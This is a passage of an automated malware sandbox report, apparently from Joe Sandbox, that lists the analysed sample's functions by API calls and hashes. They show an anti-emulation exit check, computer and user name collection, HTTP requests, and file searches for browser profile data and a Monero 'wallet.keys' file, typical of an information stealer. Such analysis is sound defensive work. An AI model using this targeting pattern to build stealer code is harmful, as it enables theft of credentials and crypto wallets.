                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                    • String ID: ERROR$ERROR
                                    • API String ID: 3287882509-2579291623
                                    • Opcode ID: afaa01846a564d7f5c46fc31297620feb6b0e9d8ff43d21689d80520259d924e
                                    • Instruction ID: 76e121dc5425604fe00f2fa5ebc5cabc0ea154c32812741bcf76bfd684cc83e5
                                    • Opcode Fuzzy Hash: afaa01846a564d7f5c46fc31297620feb6b0e9d8ff43d21689d80520259d924e
                                    • Instruction Fuzzy Hash: 7911EC30A10548ABCF14FFA4DD52AED7378AF51340F404168F91A5A593EF70AB0AE7D2
                                    Function 000978E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00097910
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00097917
                                    • GetComputerNameA.KERNEL32(?,00000104), ref: 0009792F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateComputerNameProcess
                                    • String ID:
                                    • API String ID: 1664310425-0
                                    • Opcode ID: c72957d4c71c0338fa65cb33da775f6f6d6934abbe7b4bb05429ae7188211f02
                                    • Instruction ID: baa3f63b23dc38181db5b74ebc341b919c036db1a778509a126945ffe7204b72
                                    • Opcode Fuzzy Hash: c72957d4c71c0338fa65cb33da775f6f6d6934abbe7b4bb05429ae7188211f02
                                    • Instruction Fuzzy Hash: 6A01A9B1A44208EFDB10DF94DD49FAEBBF8F704B15F10421AF645E3280C37459008BA1
                                    Function 00081110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0008112B
                                    • VirtualAllocExNuma.KERNEL32(00000000), ref: 00081132
                                    • ExitProcess.KERNEL32 ref: 00081143
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$AllocCurrentExitNumaVirtual
                                    • String ID:
                                    • API String ID: 1103761159-0
                                    • Opcode ID: e86ad2344097af7dbbcc7aaecae2fa82eb3ee2dac90205f9c37d241d14b668b9
                                    • Instruction ID: a47a99a9f603b438b4e32d1a064a6a65cffab5828dcf2b3c2e045da3c7da6f23
                                    • Opcode Fuzzy Hash: e86ad2344097af7dbbcc7aaecae2fa82eb3ee2dac90205f9c37d241d14b668b9
                                    • Instruction Fuzzy Hash: 2CE0E67098530CFBE7506BA0AC0EF4D76BCBF04B05F104154F709761D0D6B52A419B99
                                    Function 000810A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 000810B3
                                    • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 000810F7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$AllocFree
                                    • String ID:
                                    • API String ID: 2087232378-0
                                    • Opcode ID: 4be79213e06cbb8912737c47ca2827ce441d176e441a5e1e3777b3f0415a02bd
                                    • Instruction ID: f62d1edb28f9359dc8e6204123d76ed47eb8a4eda47d5d6347a24f6fe8c715dd
                                    • Opcode Fuzzy Hash: 4be79213e06cbb8912737c47ca2827ce441d176e441a5e1e3777b3f0415a02bd
                                    • Instruction Fuzzy Hash: 4BF0E271641208BBEB14ABA8AC4DFEEB7ECE705B15F300548F544E3280D5729E00DBA0
                                    Function 00081190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 000978E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00097910
                                      • Part of subcall function 000978E0: RtlAllocateHeap.NTDLL(00000000), ref: 00097917
                                      • Part of subcall function 000978E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0009792F
                                      • Part of subcall function 00097850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000811B7), ref: 00097880
                                      • Part of subcall function 00097850: RtlAllocateHeap.NTDLL(00000000), ref: 00097887
                                      • Part of subcall function 00097850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0009789F
                                    • ExitProcess.KERNEL32 ref: 000811C6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$Process$AllocateName$ComputerExitUser
                                    • String ID:
                                    • API String ID: 3550813701-0
                                    • Opcode ID: 0e0f5a116930367f754f5aa5e12448f73e73587bb73fdde90d1908d56cc693bc
                                    • Instruction ID: 6714c892f37c5318c3fd1beaa6b26343532c1a0627e89f3d8b937a5799d27840
                                    • Opcode Fuzzy Hash: 0e0f5a116930367f754f5aa5e12448f73e73587bb73fdde90d1908d56cc693bc
                                    • Instruction Fuzzy Hash: CAE0ECB696420552DE0073B0BC0EFAA329C6B15349F044425BA09D2203FE25E80196AA

                                    Non-executed Functions

                                    Function 000938B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 000938CC
                                    • FindFirstFileA.KERNEL32(?,?), ref: 000938E3
                                    • lstrcat.KERNEL32(?,?), ref: 00093935
                                    • StrCmpCA.SHLWAPI(?,000A0F70), ref: 00093947
                                    • StrCmpCA.SHLWAPI(?,000A0F74), ref: 0009395D
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00093C67
                                    • FindClose.KERNEL32(000000FF), ref: 00093C7C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                    • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                    • API String ID: 1125553467-2524465048
                                    • Opcode ID: c1fa08334285ac62e297faf4e98e9c1fd797fe1c28827dbc4cb3e2c51c29f3d5
                                    • Instruction ID: 6b8b351409bf9321cee3fcb139284c14329804460de1aff4aca52e2363f27117
                                    • Opcode Fuzzy Hash: c1fa08334285ac62e297faf4e98e9c1fd797fe1c28827dbc4cb3e2c51c29f3d5
                                    • Instruction Fuzzy Hash: 8DA13EB1A0021C9BDF24DBA4DC89FEE73B9BF49304F044598B64D96141EB759B84CFA2
                                    Function 0008BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                      • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                      • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                      • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                      • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                      • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                      • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                    • FindFirstFileA.KERNEL32(00000000,?,000A0B32,000A0B2B,00000000,?,?,?,000A13F4,000A0B2A), ref: 0008BEF5
                                    • StrCmpCA.SHLWAPI(?,000A13F8), ref: 0008BF4D
                                    • StrCmpCA.SHLWAPI(?,000A13FC), ref: 0008BF63
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0008C7BF
                                    • FindClose.KERNEL32(000000FF), ref: 0008C7D1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                    • API String ID: 3334442632-726946144
                                    • Opcode ID: a17d1c421f1a9e76dc878f80d408e4a2a4655da024be185a70879c6ffe955240
                                    • Instruction ID: 9fc96193a4b98e883a33197d564350c3ef2476bb4b703228bb949bc5950da0dd
                                    • Opcode Fuzzy Hash: a17d1c421f1a9e76dc878f80d408e4a2a4655da024be185a70879c6ffe955240
                                    • Instruction Fuzzy Hash: A5425172A10108ABDF14FBB0DD96EEE737DAF45300F404558B90A96192EF349B49DBE2
                                    Function 00094910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 0009492C
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00094943
                                    • StrCmpCA.SHLWAPI(?,000A0FDC), ref: 00094971
                                    • StrCmpCA.SHLWAPI(?,000A0FE0), ref: 00094987
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00094B7D
                                    • FindClose.KERNEL32(000000FF), ref: 00094B92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s$%s\%s$%s\*
                                    • API String ID: 180737720-445461498
                                    • Opcode ID: 1c53e8fcda11bdd429df30ce2640c2524bebf9b8395d8f60b7d2944f64576414
                                    • Instruction ID: 06d51822cb6b53465f5aed4d2a406f584295bb902355df0c62769b0c78fc268d
                                    • Opcode Fuzzy Hash: 1c53e8fcda11bdd429df30ce2640c2524bebf9b8395d8f60b7d2944f64576414
                                    • Instruction Fuzzy Hash: 656136B190021CABCF24EBA0EC49FEA73BCBB49705F048698F64996141EB75DB45CF91
                                    Function 00094570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00094580
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00094587
                                    • wsprintfA.USER32 ref: 000945A6
                                    • FindFirstFileA.KERNEL32(?,?), ref: 000945BD
                                    • StrCmpCA.SHLWAPI(?,000A0FC4), ref: 000945EB
                                    • StrCmpCA.SHLWAPI(?,000A0FC8), ref: 00094601
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0009468B
                                    • FindClose.KERNEL32(000000FF), ref: 000946A0
                                    • lstrcat.KERNEL32(?,00D3FCD0), ref: 000946C5
                                    • lstrcat.KERNEL32(?,00D3E168), ref: 000946D8
                                    • lstrlen.KERNEL32(?), ref: 000946E5
                                    • lstrlen.KERNEL32(?), ref: 000946F6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                    • String ID: %s\%s$%s\*
                                    • API String ID: 671575355-2848263008
                                    • Opcode ID: a11ce234c09430b4d1a744189129c460237a473bd51d625fde2416f847a0941a
                                    • Instruction ID: 236c7cb73e8e8414d04ecd1eab507886a7db401ed5eba9bde5cbf111871371ac
                                    • Opcode Fuzzy Hash: a11ce234c09430b4d1a744189129c460237a473bd51d625fde2416f847a0941a
                                    • Instruction Fuzzy Hash: 555153B194021C9BCB60EBB0EC89FED737CBB58304F404598F64996191EB759B858F92
                                    Function 00093EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 00093EC3
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00093EDA
                                    • StrCmpCA.SHLWAPI(?,000A0FAC), ref: 00093F08
                                    • StrCmpCA.SHLWAPI(?,000A0FB0), ref: 00093F1E
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0009406C
                                    • FindClose.KERNEL32(000000FF), ref: 00094081
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s
                                    • API String ID: 180737720-4073750446
                                    • Opcode ID: 9f0d0db778eac9e3ba04acc3d0aee3cf8ccd9e56ff1481169b0c828ba58dbceb
                                    • Instruction ID: 024379edb624e2249a6fb273a68818aa239a949ba7fc5f15b34161cf8a36e278
                                    • Opcode Fuzzy Hash: 9f0d0db778eac9e3ba04acc3d0aee3cf8ccd9e56ff1481169b0c828ba58dbceb
                                    • Instruction Fuzzy Hash: DA5145B290021CABCF24FBB0DC89EEA737CBB48304F448598F65996141DB759B89DF91
                                    Function 0008ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                    Download Yara Rule
                                    APIs
